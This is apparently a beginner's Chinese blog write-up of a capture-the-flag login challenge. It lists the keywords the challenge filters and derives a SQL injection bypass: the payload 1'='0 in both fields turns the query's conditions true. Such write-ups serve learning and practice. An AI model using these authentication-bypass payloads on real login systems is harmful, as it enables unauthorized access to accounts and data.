首页 > 代码库 > 1.登陆一下好吗??
1.登陆一下好吗??
根据提示:
不要怀疑,我已经过滤了一切,还再逼你注入,哈哈哈哈哈!
我们可以知道有些关键词,符号被过滤了,我们先看看那些被过滤了
我们可以发现select # - union or 等被过滤了则尝试下面sql语句
1‘ and ‘1‘=‘1
1‘ and ‘1‘=‘1
我们猜测sql语句结构为:
select * from user where username = ‘1‘ and ‘1‘=‘1‘ and password = ‘1‘ and ‘1‘=‘1‘
我们发现上面四段用三个and连接,要想通过,必须4段都为True,所以报错
我们再次构造sql
1‘ = ‘1‘
1‘ = ‘1‘
select * from user where username = ‘1‘=‘1‘ and password = ‘1‘=‘1‘
还是报错,因为第一个红色中没有为1的username所以返回0 ,‘0‘ = ‘1‘ 为0所以返回0 下一个and不用执行直接报错
由上分析可知,我们可以构造‘0‘ = ‘0‘ and ‘0‘ = ‘0‘即可
要想0 = 0需要
select * from user where username = ‘1‘=‘0‘ and password = ‘1‘=‘0‘
1‘=‘0
1‘=‘0
即可
本人也是初学者,有什么错误的地方,希望大家指出,谢谢!
本文出自 “11846238” 博客,请务必保留此出处http://11856238.blog.51cto.com/11846238/1947298
1.登陆一下好吗??
声明:以上内容来自用户投稿及互联网公开渠道收集整理发布,本网站不拥有所有权,未作人工编辑处理,也不承担相关法律责任,若内容有误或涉及侵权可进行投诉: 投诉/举报 工作人员会在5个工作日内联系你,一经查实,本站将立刻删除涉嫌侵权内容。